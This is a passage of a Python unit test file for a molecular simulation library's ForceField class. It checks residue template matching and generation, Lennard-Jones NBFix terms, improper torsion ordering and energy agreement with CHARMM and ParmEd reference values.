<UseAttributeFromResidue name="charge"/>
<Atom type="tip3p-O" sigma="0.315" epsilon="0.635"/>
<Atom type="tip3p-H" sigma="1" epsilon="0"/>
</NonbondedForce>
</ForceField>"""
ff = ForceField(StringIO(xml))
# Load a water box.
prmtop = AmberPrmtopFile('systems/water-box-216.prmtop')
top = prmtop.topology
# Building a System should fail, because two templates match each residue.
self.assertRaises(Exception, lambda: ff.createSystem(top))
# Register a template matcher that selects a particular one.
def matcher(ff, res, bondedToAtom, ignoreExternalBonds, ignoreExtraParticles):
return ff._templates['HOH2']
ff.registerTemplateMatcher(matcher)
# It should now succeed in building a System.
system = ff.createSystem(top)
# Make sure it used the correct parameters.
nb = [f for f in system.getForces() if isinstance(f, NonbondedForce)][0]
for atom in top.atoms():
charge, sigma, epsilon = nb.getParticleParameters(atom.index)
if atom.name == 'O':
self.assertEqual(0.834*elementary_charge, charge)
else:
self.assertEqual(-0.417*elementary_charge, charge)
def test_residueTemplateGenerator(self):
"""Test the ability to add residue template generators to parameterize unmatched residues."""
def simpleTemplateGenerator(forcefield, residue):
"""\
Simple residue template generator.
This implementation uses the programmatic API to define residue templates.
NOTE: We presume we have already loaded the force definitions into ForceField.
"""
# Generate a unique prefix name for generating parameters.
from uuid import uuid4
template_name = uuid4()
# Create residue template.
from openmm.app.forcefield import _createResidueTemplate
template = _createResidueTemplate(residue) # use helper function
template.name = template_name # replace template name
for (template_atom, residue_atom) in zip(template.atoms, residue.atoms()):
template_atom.type = 'XXX' # replace atom type
# Register the template.
forcefield.registerResidueTemplate(template)
# Signal that we have successfully parameterized the residue.
return True
# Define forcefield parameters used by simpleTemplateGenerator.
# NOTE: This parameter definition file will currently only work for residues that either have
# no external bonds or external bonds to other residues parameterized by the simpleTemplateGenerator.
simple_ffxml_contents = """
<ForceField>
<AtomTypes>
<Type name="XXX" class="XXX" element="C" mass="12.0"/>
</AtomTypes>
<HarmonicBondForce>
<Bond type1="XXX" type2="XXX" length="0.1409" k="392459.2"/>
</HarmonicBondForce>
<HarmonicAngleForce>
<Angle type1="XXX" type2="XXX" type3="XXX" angle="2.09439510239" k="527.184"/>
</HarmonicAngleForce>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5">
<Atom type="XXX" charge="0.000" sigma="0.315" epsilon="0.635"/>
</NonbondedForce>
</ForceField>"""
#
# Test where we generate parameters for only a ligand.
#
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'T4-lysozyme-L99A-p-xylene-implicit.pdb'))
# Create a ForceField object.
forcefield = ForceField('amber99sb.xml', 'tip3p.xml', StringIO(simple_ffxml_contents))
# Add the residue template generator.
forcefield.registerTemplateGenerator(simpleTemplateGenerator)
# Parameterize system.
system = forcefield.createSystem(pdb.topology, nonbondedMethod=NoCutoff)
# TODO: Test energies are finite?
#
# Test for a few systems where we generate all parameters.
#
tests = [
{ 'pdb_filename' : 'alanine-dipeptide-implicit.pdb', 'nonbondedMethod' : NoCutoff },
{ 'pdb_filename' : 'lysozyme-implicit.pdb', 'nonbondedMethod' : NoCutoff },
{ 'pdb_filename' : 'alanine-dipeptide-explicit.pdb', 'nonbondedMethod' : CutoffPeriodic },
]
# Test all systems with separate ForceField objects.
for test in tests:
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', test['pdb_filename']))
# Create a ForceField object.
forcefield = ForceField(StringIO(simple_ffxml_contents))
# Add the residue template generator.
forcefield.registerTemplateGenerator(simpleTemplateGenerator)
# Parameterize system.
system = forcefield.createSystem(pdb.topology, nonbondedMethod=test['nonbondedMethod'])
# TODO: Test energies are finite?
# Now test all systems with a single ForceField object.
# Create a ForceField object.
forcefield = ForceField(StringIO(simple_ffxml_contents))
# Add the residue template generator.
forcefield.registerTemplateGenerator(simpleTemplateGenerator)
for test in tests:
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', test['pdb_filename']))
# Parameterize system.
system = forcefield.createSystem(pdb.topology, nonbondedMethod=test['nonbondedMethod'])
# TODO: Test energies are finite?
def test_getUnmatchedResidues(self):
"""Test retrieval of list of residues for which no templates are available."""
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'T4-lysozyme-L99A-p-xylene-implicit.pdb'))
# Create a ForceField object.
forcefield = ForceField('amber99sb.xml', 'tip3p.xml')
# Get list of unmatched residues.
unmatched_residues = forcefield.getUnmatchedResidues(pdb.topology)
# Check results.
self.assertEqual(len(unmatched_residues), 1)
self.assertEqual(unmatched_residues[0].name, 'TMP')
self.assertEqual(unmatched_residues[0].id, '163')
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'ala_ala_ala.pdb'))
# Create a ForceField object.
forcefield = ForceField('tip3p.xml')
# Get list of unmatched residues.
unmatched_residues = forcefield.getUnmatchedResidues(pdb.topology)
# Check results.
self.assertEqual(len(unmatched_residues), 3)
self.assertEqual(unmatched_residues[0].name, 'ALA')
self.assertEqual(unmatched_residues[0].chain.id, 'X')
self.assertEqual(unmatched_residues[0].id, '1')
def test_generateTemplatesForUnmatchedResidues(self):
"""Test generation of blank forcefield residue templates for unmatched residues."""
#
# Test where we generate parameters for only a ligand.
#
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'nacl-water.pdb'))
# Create a ForceField object.
forcefield = ForceField('tip3p.xml')
# Get list of unmatched residues.
unmatched_residues = forcefield.getUnmatchedResidues(pdb.topology)
[templates, residues] = forcefield.generateTemplatesForUnmatchedResidues(pdb.topology)
# Check results.
self.assertEqual(len(unmatched_residues), 24)
self.assertEqual(len(residues), 2)
self.assertEqual(len(templates), 2)
unique_names = set([ residue.name for residue in residues ])
self.assertTrue('HOH' not in unique_names)
self.assertTrue('NA' in unique_names)
self.assertTrue('CL' in unique_names)
template_names = set([ template.name for template in templates ])
self.assertTrue('HOH' not in template_names)
self.assertTrue('NA' in template_names)
self.assertTrue('CL' in template_names)
# Define forcefield parameters using returned templates.
# NOTE: This parameter definition file will currently only work for residues that either have
# no external bonds or external bonds to other residues parameterized by the simpleTemplateGenerator.
simple_ffxml_contents = """
<ForceField>
<AtomTypes>
<Type name="XXX" class="XXX" element="C" mass="12.0"/>
</AtomTypes>
<HarmonicBondForce>
<Bond type1="XXX" type2="XXX" length="0.1409" k="392459.2"/>
</HarmonicBondForce>
<HarmonicAngleForce>
<Angle type1="XXX" type2="XXX" type3="XXX" angle="2.09439510239" k="527.184"/>
</HarmonicAngleForce>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5">
<Atom type="XXX" charge="0.000" sigma="0.315" epsilon="0.635"/>
</NonbondedForce>
</ForceField>"""
#
        # Test the pre-generation of a missing residue template for a ligand.
#
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'T4-lysozyme-L99A-p-xylene-implicit.pdb'))
# Create a ForceField object.
forcefield = ForceField('amber99sb.xml', 'tip3p.xml', StringIO(simple_ffxml_contents))
# Get list of unique unmatched residues.
[templates, residues] = forcefield.generateTemplatesForUnmatchedResidues(pdb.topology)
# Add residue templates to forcefield.
for template in templates:
# Replace atom types.
for atom in template.atoms:
atom.type = 'XXX'
# Register the template.
forcefield.registerResidueTemplate(template)
# Parameterize system.
system = forcefield.createSystem(pdb.topology, nonbondedMethod=NoCutoff)
# TODO: Test energies are finite?
def test_getMatchingTemplates(self):
"""Test retrieval of list of templates that match residues in a topology."""
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'ala_ala_ala.pdb'))
# Create a ForceField object.
forcefield = ForceField('amber99sb.xml')
# Get list of matching residue templates.
templates = forcefield.getMatchingTemplates(pdb.topology)
# Check results.
residues = [ residue for residue in pdb.topology.residues() ]
self.assertEqual(len(templates), len(residues))
self.assertEqual(templates[0].name, 'NALA')
self.assertEqual(templates[1].name, 'ALA')
self.assertEqual(templates[2].name, 'CALA')
def test_Wildcard(self):
"""Test that PeriodicTorsionForces using wildcard ('') for atom types / classes in the ffxml are correctly registered"""
# Use wildcards in types
xml = """
<ForceField>
<AtomTypes>
<Type name="C" class="C" element="C" mass="12.010000"/>
<Type name="O" class="O" element="O" mass="16.000000"/>
</AtomTypes>
<PeriodicTorsionForce>
<Proper type1="" type2="C" type3="C" type4="" periodicity1="2" phase1="3.141593" k1="15.167000"/>
<Improper type1="C" type2="" type3="" type4="O" periodicity1="2" phase1="3.141593" k1="43.932000"/>
</PeriodicTorsionForce>
</ForceField>"""
ff = ForceField(StringIO(xml))
self.assertEqual(len(ff._forces[0].proper), 1)
self.assertEqual(len(ff._forces[0].improper), 1)
# Use wildcards in classes
xml = """
<ForceField>
<AtomTypes>
<Type name="C" class="C" element="C" mass="12.010000"/>
<Type name="O" class="O" element="O" mass="16.000000"/>
</AtomTypes>
<PeriodicTorsionForce>
<Proper class1="" class2="C" class3="C" class4="" periodicity1="2" phase1="3.141593" k1="15.167000"/>
<Improper class1="C" class2="" class3="" class4="O" periodicity1="2" phase1="3.141593" k1="43.932000"/>
</PeriodicTorsionForce>
</ForceField>"""
ff = ForceField(StringIO(xml))
self.assertEqual(len(ff._forces[0].proper), 1)
self.assertEqual(len(ff._forces[0].improper), 1)
def test_ScalingFactorCombining(self):
""" Tests that FFs can be combined if their scaling factors are very close """
forcefield = ForceField('amber99sb.xml', os.path.join('systems', 'test_amber_ff.xml'))
# This would raise an exception if it didn't work
def test_MultipleFilesandForceTags(self):
"""Test that the order of listing of multiple ffxmls does not matter.
Tests that one generator per force type is created and that the ffxml
        defining atom types does not have to be listed first."""
ffxml = """<ForceField>
<Residues>
<Residue name="ACE-Test">
<Atom name="HH31" type="710"/>
<Atom name="CH3" type="711"/>
<Atom name="HH32" type="710"/>
<Atom name="HH33" type="710"/>
<Atom name="C" type="712"/>
<Atom name="O" type="713"/>
<Bond from="0" to="1"/>
<Bond from="1" to="2"/>
<Bond from="1" to="3"/>
<Bond from="1" to="4"/>
<Bond from="4" to="5"/>
<ExternalBond from="4"/>
</Residue>
</Residues>
<PeriodicTorsionForce>
<Proper class1="C" class2="C" class3="C" class4="C" periodicity1="2" phase1="3.14159265359" k1="10.46"/>
<Improper class1="C" class2="C" class3="C" class4="C" periodicity1="2" phase1="3.14159265359" k1="43.932"/>
</PeriodicTorsionForce>
</ForceField>"""
ff1 = ForceField(StringIO(ffxml), 'amber99sbildn.xml')
ff2 = ForceField('amber99sbildn.xml', StringIO(ffxml))
self.assertEqual(len(ff1._forces), 4)
self.assertEqual(len(ff2._forces), 4)
pertorsion1 = ff1._forces[0]
pertorsion2 = ff2._forces[2]
self.assertEqual(len(pertorsion1.proper), 110)
self.assertEqual(len(pertorsion1.improper), 42)
self.assertEqual(len(pertorsion2.proper), 110)
self.assertEqual(len(pertorsion2.improper), 42)
def test_ResidueTemplateUserChoice(self):
"""Test createSystem does not allow multiple matching templates, unless
user has specified which template to use via residueTemplates arg"""
ffxml = """<ForceField>
<AtomTypes>
<Type name="Fe2+" class="Fe2+" element="Fe" mass="55.85"/>
<Type name="Fe3+" class="Fe3+" element="Fe" mass="55.85"/>
</AtomTypes>
<Residues>
<Residue name="FE2">
<Atom name="FE2" type="Fe2+" charge="2.0"/>
</Residue>
<Residue name="FE">
<Atom name="FE" type="Fe3+" charge="3.0"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333333333" lj14scale="0.5">
<UseAttributeFromResidue name="charge"/>
<Atom type="Fe2+" sigma="0.227535532613" epsilon="0.0150312292"/>
<Atom type="Fe3+" sigma="0.192790482606" epsilon="0.00046095128"/>
</NonbondedForce>
</ForceField>"""
pdb_string = "ATOM 1 FE FE A 1 20.956 27.448 -29.067 1.00 0.00 Fe"
ff = ForceField(StringIO(ffxml))
pdb = PDBFile(StringIO(pdb_string))
self.assertRaises(Exception, lambda: ff.createSystem(pdb.topology))
sys = ff.createSystem(pdb.topology, residueTemplates={list(pdb.topology.residues())[0] : 'FE2'})
# confirm charge
self.assertEqual(sys.getForce(0).getParticleParameters(0)[0]._value, 2.0)
sys = ff.createSystem(pdb.topology, residueTemplates={list(pdb.topology.residues())[0] : 'FE'})
# confirm charge
self.assertEqual(sys.getForce(0).getParticleParameters(0)[0]._value, 3.0)
def test_ResidueOverriding(self):
"""Test residue overriding via override tag in the XML"""
ffxml1 = """<ForceField>
<AtomTypes>
<Type name="Fe2+_tip3p_HFE" class="Fe2+_tip3p_HFE" element="Fe" mass="55.85"/>
</AtomTypes>
<Residues>
<Residue name="FE2">
<Atom name="FE2" type="Fe2+_tip3p_HFE" charge="2.0"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333333333" lj14scale="0.5">
<UseAttributeFromResidue name="charge"/>
<Atom type="Fe2+_tip3p_HFE" sigma="0.227535532613" epsilon="0.0150312292"/>
</NonbondedForce>
</ForceField>"""
ffxml2 = """<ForceField>
<AtomTypes>
<Type name="Fe2+_tip3p_standard" class="Fe2+_tip3p_standard" element="Fe" mass="55.85"/>
</AtomTypes>
<Residues>
<Residue name="FE2">
<Atom name="FE2" type="Fe2+_tip3p_standard" charge="2.0"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333333333" lj14scale="0.5">
<UseAttributeFromResidue name="charge"/>
<Atom type="Fe2+_tip3p_standard" sigma="0.241077193129" epsilon="0.03940482832"/>
</NonbondedForce>
</ForceField>"""
ffxml3 = """<ForceField>
<AtomTypes>
<Type name="Fe2+_tip3p_standard" class="Fe2+_tip3p_standard" element="Fe" mass="55.85"/>
</AtomTypes>
<Residues>
<Residue name="FE2" override="1">
<Atom name="FE2" type="Fe2+_tip3p_standard" charge="2.0"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333333333" lj14scale="0.5">
<UseAttributeFromResidue name="charge"/>
<Atom type="Fe2+_tip3p_standard" sigma="0.241077193129" epsilon="0.03940482832"/>
</NonbondedForce>
</ForceField>"""
pdb_string = "ATOM 1 FE FE A 1 20.956 27.448 -29.067 1.00 0.00 Fe"
pdb = PDBFile(StringIO(pdb_string))
self.assertRaises(Exception, lambda: ForceField(StringIO(ffxml1), StringIO(ffxml2)))
ff = ForceField(StringIO(ffxml1), StringIO(ffxml3))
self.assertEqual(ff._templates['FE2'].atoms[0].type, 'Fe2+_tip3p_standard')
ff.createSystem(pdb.topology)
def test_LennardJonesGenerator(self):
""" Test the LennardJones generator"""
warnings.filterwarnings('ignore', category=CharmmPSFWarning)
psf = CharmmPsfFile('systems/ions.psf')
pdb = PDBFile('systems/ions.pdb')
        params = CharmmParameterSet('systems/toppar_water_ions.str')
# Box dimensions (found from bounding box)
psf.setBox(12.009*angstroms, 12.338*angstroms, 11.510*angstroms)
# Turn off charges so we only test the Lennard-Jones energies
for a in psf.atom_list:
a.charge = 0.0
# Now compute the full energy
plat = Platform.getPlatformByName('Reference')
system = psf.createSystem(params, nonbondedMethod=PME,
nonbondedCutoff=5*angstroms)
con = Context(system, VerletIntegrator(2*femtoseconds), plat)
con.setPositions(pdb.positions)
# Now set up system from ffxml.
xml = """
<ForceField>
<AtomTypes>
<Type name="SOD" class="SOD" element="Na" mass="22.98977"/>
<Type name="CLA" class="CLA" element="Cl" mass="35.45"/>
</AtomTypes>
<Residues>
<Residue name="CLA">
<Atom name="CLA" type="CLA"/>
</Residue>
<Residue name="SOD">
<Atom name="SOD" type="SOD"/>
</Residue>
</Residues>
<LennardJonesForce lj14scale="1.0" useDispersionCorrection="False">
<Atom type="CLA" sigma="0.404468018036" epsilon="0.6276"/>
<Atom type="SOD" sigma="0.251367073323" epsilon="0.1962296"/>
<NBFixPair type1="CLA" type2="SOD" sigma="0.33239431" epsilon="0.350933"/>
</LennardJonesForce>
</ForceField> """
ff = ForceField(StringIO(xml))
system2 = ff.createSystem(pdb.topology, nonbondedMethod=PME,
nonbondedCutoff=5*angstroms)
con2 = Context(system2, VerletIntegrator(2*femtoseconds), plat)
con2.setPositions(pdb.positions)
state = con.getState(getEnergy=True, enforcePeriodicBox=True)
ene = state.getPotentialEnergy().value_in_unit(kilocalories_per_mole)
state2 = con2.getState(getEnergy=True, enforcePeriodicBox=True)
ene2 = state2.getPotentialEnergy().value_in_unit(kilocalories_per_mole)
self.assertAlmostEqual(ene, ene2)
def test_NBFix(self):
"""Test using LennardJonesGenerator to implement NBFix terms."""
# Create a chain of five atoms.
top = Topology()
chain = top.addChain()
res = top.addResidue('RES', chain)
top.addAtom('A', elem.oxygen, res)
top.addAtom('B', elem.carbon, res)
top.addAtom('C', elem.carbon, res)
top.addAtom('D', elem.carbon, res)
top.addAtom('E', elem.nitrogen, res)
atoms = list(top.atoms())
top.addBond(atoms[0], atoms[1])
top.addBond(atoms[1], atoms[2])
top.addBond(atoms[2], atoms[3])
top.addBond(atoms[3], atoms[4])
# Create the force field and system.
xml = """
<ForceField>
<AtomTypes>
<Type name="A" class="A" element="O" mass="1"/>
<Type name="B" class="B" element="C" mass="1"/>
<Type name="C" class="C" element="C" mass="1"/>
<Type name="D" class="D" element="C" mass="1"/>
<Type name="E" class="E" element="N" mass="1"/>
</AtomTypes>
<Residues>
<Residue name="RES">
<Atom name="A" type="A"/>
<Atom name="B" type="B"/>
<Atom name="C" type="C"/>
<Atom name="D" type="D"/>
<Atom name="E" type="E"/>
<Bond atomName1="A" atomName2="B"/>
<Bond atomName1="B" atomName2="C"/>
<Bond atomName1="C" atomName2="D"/>
<Bond atomName1="D" atomName2="E"/>
</Residue>
</Residues>
<LennardJonesForce lj14scale="0.3">
<Atom type="A" sigma="1" epsilon="0.1"/>
<Atom type="B" sigma="2" epsilon="0.2"/>
<Atom type="C" sigma="3" epsilon="0.3"/>
<Atom type="D" sigma="4" epsilon="0.4"/>
<Atom type="E" sigma="4" epsilon="0.4"/>
<NBFixPair type1="A" type2="D" sigma="2.5" epsilon="1.1"/>
<NBFixPair type1="A" type2="E" sigma="3.5" epsilon="1.5"/>
</LennardJonesForce>
</ForceField> """
ff = ForceField(StringIO(xml))
system = ff.createSystem(top)
# Check that it produces the correct energy.
integrator = VerletIntegrator(0.001)
context = Context(system, integrator, Platform.getPlatform(0))
positions = [Vec3(i, 0, 0) for i in range(5)]*nanometers
context.setPositions(positions)
def ljEnergy(sigma, epsilon, r):
return 4*epsilon*((sigma/r)**12-(sigma/r)**6)
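        # A sketch of where the expected value comes from (derived from the
        # topology and XML above, with the atoms spaced 1 nm apart along x):
        #   A-D: a 1-4 pair covered by an explicit NBFixPair (sigma=2.5,
        #        epsilon=1.1), scaled by lj14scale=0.3, at r=3.
        #   B-E: a 1-4 pair using Lorentz-Berthelot combining, sigma=(2+4)/2=3,
        #        epsilon=sqrt(0.2*0.4)=sqrt(0.08), scaled by 0.3, at r=3.
        #   A-E: a full (non-excluded) pair covered by an explicit NBFixPair
        #        (sigma=3.5, epsilon=1.5), at r=4.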
expected = 0.3*ljEnergy(2.5, 1.1, 3) + 0.3*ljEnergy(3.0, sqrt(0.08), 3) + ljEnergy(3.5, 1.5, 4)
self.assertAlmostEqual(expected, context.getState(getEnergy=True).getPotentialEnergy().value_in_unit(kilojoules_per_mole))
def test_IgnoreExternalBonds(self):
"""Test the ignoreExternalBonds option"""
modeller = Modeller(self.pdb2.topology, self.pdb2.positions)
modeller.delete([next(modeller.topology.residues())])
self.assertRaises(Exception, lambda: self.forcefield2.createSystem(modeller.topology))
system = self.forcefield2.createSystem(modeller.topology, ignoreExternalBonds=True)
templates = self.forcefield2.getMatchingTemplates(modeller.topology, ignoreExternalBonds=True)
self.assertEqual(2, len(templates))
self.assertEqual('ALA', templates[0].name)
self.assertEqual('NME', templates[1].name)
def test_Includes(self):
"""Test using a ForceField that includes other files."""
forcefield = ForceField(os.path.join('systems', 'ff_with_includes.xml'))
self.assertTrue(len(forcefield._atomTypes) > 10)
self.assertTrue('spce-O' in forcefield._atomTypes)
self.assertTrue('HOH' in forcefield._templates)
def test_ImpropersOrdering(self):
"""Test correctness of the ordering of atom indexes in improper torsions
and the torsion.ordering parameter.
"""
xml = """
<ForceField>
<PeriodicTorsionForce ordering="amber">
<Improper class1="C" class2="" class3="O2" class4="O2" periodicity1="2" phase1="3.14159265359" k1="43.932"/>
</PeriodicTorsionForce>
</ForceField>
"""
pdb = PDBFile('systems/impropers_ordering_tetrapeptide.pdb')
# ff1 uses default ordering of impropers, ff2 uses "amber" for the one
# problematic improper
ff1 = ForceField('amber99sbildn.xml')
ff2 = ForceField(StringIO(xml), 'amber99sbildn.xml')
system1 = ff1.createSystem(pdb.topology)
system2 = ff2.createSystem(pdb.topology)
imp1 = system1.getForce(1).getTorsionParameters(158)
imp2 = system2.getForce(0).getTorsionParameters(158)
system1_indexes = [imp1[0], imp1[1], imp1[2], imp1[3]]
system2_indexes = [imp2[0], imp2[1], imp2[2], imp2[3]]
self.assertEqual(system1_indexes, [51, 55, 54, 56])
self.assertEqual(system2_indexes, [51, 55, 54, 56])
def test_ImpropersOrdering_smirnoff(self):
"""Test correctness of the ordering of atom indexes in improper torsions
and the torsion.ordering parameter when using the 'smirnoff' mode.
"""
# SMIRNOFF parameters for formaldehyde
xml = """
<ForceField>
<AtomTypes>
<Type name="[H]C(=O)[H]$C1#0" element="C" mass="12.01078" class="[H]C(=O)[H]$C1#0"/>
<Type name="[H]C(=O)[H]$O1#1" element="O" mass="15.99943" class="[H]C(=O)[H]$O1#1"/>
<Type name="[H]C(=O)[H]$H1#2" element="H" mass="1.007947" class="[H]C(=O)[H]$H1#2"/>
<Type name="[H]C(=O)[H]$H2#3" element="H" mass="1.007947" class="[H]C(=O)[H]$H2#3"/>
</AtomTypes>
<PeriodicTorsionForce ordering="smirnoff">
<Improper class1="[H]C(=O)[H]$C1#0" class2="[H]C(=O)[H]$O1#1" class3="[H]C(=O)[H]$H1#2" class4="[H]C(=O)[H]$H2#3" periodicity1="2" phase1="3.141592653589793" k1="1.5341333333333336"/>
<Improper class1="[H]C(=O)[H]$C1#0" class2="[H]C(=O)[H]$H1#2" class3="[H]C(=O)[H]$H2#3" class4="[H]C(=O)[H]$O1#1" periodicity1="2" phase1="3.141592653589793" k1="1.5341333333333336"/>
<Improper class1="[H]C(=O)[H]$C1#0" class2="[H]C(=O)[H]$H2#3" class3="[H]C(=O)[H]$O1#1" class4="[H]C(=O)[H]$H1#2" periodicity1="2" phase1="3.141592653589793" k1="1.5341333333333336"/>
</PeriodicTorsionForce>
<Residues>
<Residue name="[H]C(=O)[H]">
<Atom name="C1" type="[H]C(=O)[H]$C1#0" charge="0.5632799863815308"/>
<Atom name="O1" type="[H]C(=O)[H]$O1#1" charge="-0.514739990234375"/>
<Atom name="H1" type="[H]C(=O)[H]$H1#2" charge="-0.02426999807357788"/>
<Atom name="H2" type="[H]C(=O)[H]$H2#3" charge="-0.02426999807357788"/>
<Bond atomName1="C1" atomName2="O1"/>
<Bond atomName1="C1" atomName2="H1"/>
<Bond atomName1="C1" atomName2="H2"/>
</Residue>
</Residues>
</ForceField>
"""
pdb = PDBFile('systems/formaldehyde.pdb')
        # This force field uses ordering="smirnoff", which should apply the
        # improper in the three-fold trefoil pattern checked below.
ff = ForceField(StringIO(xml))
system = ff.createSystem(pdb.topology)
# Check that impropers are applied in the correct three-fold trefoil pattern
forces = { force.__class__.__name__ : force for force in system.getForces() }
force = forces['PeriodicTorsionForce']
created_torsions = set()
for index in range(force.getNumTorsions()):
i,j,k,l,_,_,_ = force.getTorsionParameters(index)
created_torsions.add((i,j,k,l))
expected_torsions = set([(0,3,1,2), (0,1,2,3), (0,2,3,1)])
self.assertEqual(expected_torsions, created_torsions)
def test_Disulfides(self):
"""Test that various force fields handle disulfides correctly."""
pdb = PDBFile('systems/bpti.pdb')
for ff in ['amber99sb.xml', 'amber14-all.xml', 'charmm36.xml', 'amberfb15.xml', 'amoeba2013.xml']:
forcefield = ForceField(ff)
system = forcefield.createSystem(pdb.topology)
def test_IdenticalTemplates(self):
"""Test a case where patches produce two identical templates."""
ff = ForceField('charmm36.xml')
pdb = PDBFile(StringIO("""
ATOM 1 N HIS 1A -2.670 -0.476 0.475 1.00 0.00 N
ATOM 2 HT1 HIS 1A -2.645 -1.336 1.036 1.00 0.00 H
ATOM 3 HT2 HIS 1A -2.859 -0.751 -0.532 1.00 0.00 H
ATOM 4 HT3 HIS 1A -3.415 0.201 0.731 1.00 0.00 H
ATOM 5 CA HIS 1A -1.347 0.163 0.471 1.00 0.00 C
ATOM 6 HA HIS 1A -1.111 0.506 1.479 1.00 0.00 H
ATOM 7 CB HIS 1A -0.352 -0.857 -0.040 1.00 0.00 C
ATOM 8 HB1 HIS 1A -0.360 -1.741 0.636 1.00 0.00 H
ATOM 9 HB2 HIS 1A -0.640 -1.175 -1.046 1.00 0.00 H
ATOM 10 CG HIS 1A 1.003 -0.275 -0.063 1.00 0.00 C
ATOM 11 CD2 HIS 1A 2.143 -0.931 -0.476 1.00 0.00 C
ATOM 12 HD2 HIS 1A 2.217 -1.952 -0.840 1.00 0.00 H
ATOM 13 NE2 HIS 1A 3.137 -0.024 -0.328 1.00 0.00 N
ATOM 14 HE2 HIS 1A 4.132 -0.238 -0.565 1.00 0.00 H
ATOM 15 CE1 HIS 1A 2.649 1.130 0.150 1.00 0.00 C
ATOM 16 HE1 HIS 1A 3.233 2.020 0.360 1.00 0.00 H
ATOM 17 ND1 HIS 1A 1.323 0.973 0.314 1.00 0.00 N
ATOM 18 C HIS 1A -1.465 1.282 -0.497 1.00 0.00 C
ATOM 19 OT1 HIS 1A -2.108 2.309 -0.180 1.00 0.00 O
ATOM 20 OT2 HIS 1A -0.864 1.172 -1.737 1.00 0.00 O
END"""))
# If the check is not done correctly, this will throw an exception.
ff.createSystem(pdb.topology)
def test_CharmmPolar(self):
"""Test the CHARMM polarizable force field."""
pdb = PDBFile('systems/ala_ala_ala_drude.pdb')
pdb.topology.setUnitCellDimensions(Vec3(3, 3, 3))
ff = ForceField('charmm_polar_2019.xml')
system = ff.createSystem(pdb.topology, nonbondedMethod=PME, nonbondedCutoff=1.2*nanometers)
for i,f in enumerate(system.getForces()):
f.setForceGroup(i)
if isinstance(f, NonbondedForce):
f.setPMEParameters(3.4, 64, 64, 64)
integrator = DrudeLangevinIntegrator(300, 1.0, 1.0, 10.0, 0.001)
context = Context(system, integrator, Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
# Compare the energy to values computed by CHARMM. Here is what it outputs:
# ENER ENR: Eval# ENERgy Delta-E GRMS
# ENER INTERN: BONDs ANGLes UREY-b DIHEdrals IMPRopers
# ENER CROSS: CMAPs PMF1D PMF2D PRIMO
# ENER EXTERN: VDWaals ELEC HBONds ASP USER
# ENER EWALD: EWKSum EWSElf EWEXcl EWQCor EWUTil
# ---------- --------- --------- --------- --------- ---------
# ENER> 0 102.83992 0.00000 13.06415
# ENER INTERN> 54.72574 40.21459 11.61009 26.10373 0.14113
# ENER CROSS> -3.37113 0.00000 0.00000 0.00000
# ENER EXTERN> 22.74761 -24.21667 0.00000 0.00000 0.00000
# ENER EWALD> 56.14258 -7279.07968 7197.82192 0.00000 0.00000
# ---------- --------- --------- --------- --------- ---------
# First check the total energy.
energy = context.getState(getEnergy=True).getPotentialEnergy().value_in_unit(kilocalories_per_mole)
self.assertAlmostEqual(102.83992, energy, delta=energy*1e-3)
# Now check individual components. CHARMM and OpenMM split them up a little differently. I've tried to
# match things up, but I think there's still some inconsistency in where forces related to Drude particles
# are categorized. That's why the Coulomb and bonds terms match less accurately than the other terms
# (and less accurately than the total energy, which agrees well).
coulomb = 0
vdw = 0
bonds = 0
angles = 0
propers = 0
impropers = 0
cmap = 0
for i,f in enumerate(system.getForces()):
energy = context.getState(getEnergy=True, groups={i}).getPotentialEnergy().value_in_unit(kilocalories_per_mole)
if isinstance(f, NonbondedForce):
coulomb += energy
elif isinstance(f, CustomNonbondedForce) or isinstance(f, CustomBondForce):
vdw += energy
elif isinstance(f, HarmonicBondForce) or isinstance(f, DrudeForce):
bonds += energy
elif isinstance(f, HarmonicAngleForce):
angles += energy
elif isinstance(f, PeriodicTorsionForce):
propers += energy
elif isinstance(f, CustomTorsionForce):
impropers += energy
elif isinstance(f, CMAPTorsionForce):
cmap += energy
self.assertAlmostEqual(-24.21667+56.14258-7279.07968+7197.82192, coulomb, delta=abs(coulomb)*5e-2) # ELEC+EWKSum+EWSElf+EWEXcl
self.assertAlmostEqual(22.74761, vdw, delta=vdw*1e-3) # VDWaals
self.assertAlmostEqual(54.72574+11.61009, bonds, delta=bonds*2e-2) # BONDs+UREY-b
self.assertAlmostEqual(40.21459, angles, delta=angles*1e-3) # ANGLes
self.assertAlmostEqual(26.10373, propers, delta=propers*1e-3) # DIHEdrals
self.assertAlmostEqual(0.14113, impropers, delta=impropers*1e-3) # IMPRopers
def test_InitializationScript(self):
"""Test that <InitializationScript> tags get executed."""
xml = """
<ForceField>
<InitializationScript>
self.scriptExecuted = True
</InitializationScript>
</ForceField>
"""
ff = ForceField(StringIO(xml))
self.assertTrue(ff.scriptExecuted)
def test_Glycam(self):
"""Test computing energy with GLYCAM."""
ff = ForceField('amber14/protein.ff14SB.xml', 'amber14/GLYCAM_06j-1.xml')
pdb = PDBFile('systems/glycopeptide.pdb')
system = ff.createSystem(pdb.topology)
for i, f in enumerate(system.getForces()):
f.setForceGroup(i)
integrator = VerletIntegrator(0.001)
context = Context(system, integrator, Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
energies = {}
for i, f in enumerate(system.getForces()):
energy = context.getState(getEnergy=True, groups={i}).getPotentialEnergy().value_in_unit(kilojoules_per_mole)
energies[f.getName()] = energy
# Compare to values computed with ParmEd.
self.assertAlmostEqual(32.14082401103625, energies['HarmonicBondForce'], 4)
self.assertAlmostEqual(48.92017455984504, energies['HarmonicAngleForce'], 3)
self.assertAlmostEqual(291.61241586209286, energies['PeriodicTorsionForce'], 4)
self.assertAlmostEqual(1547.011267801862, energies['NonbondedForce'], 4)
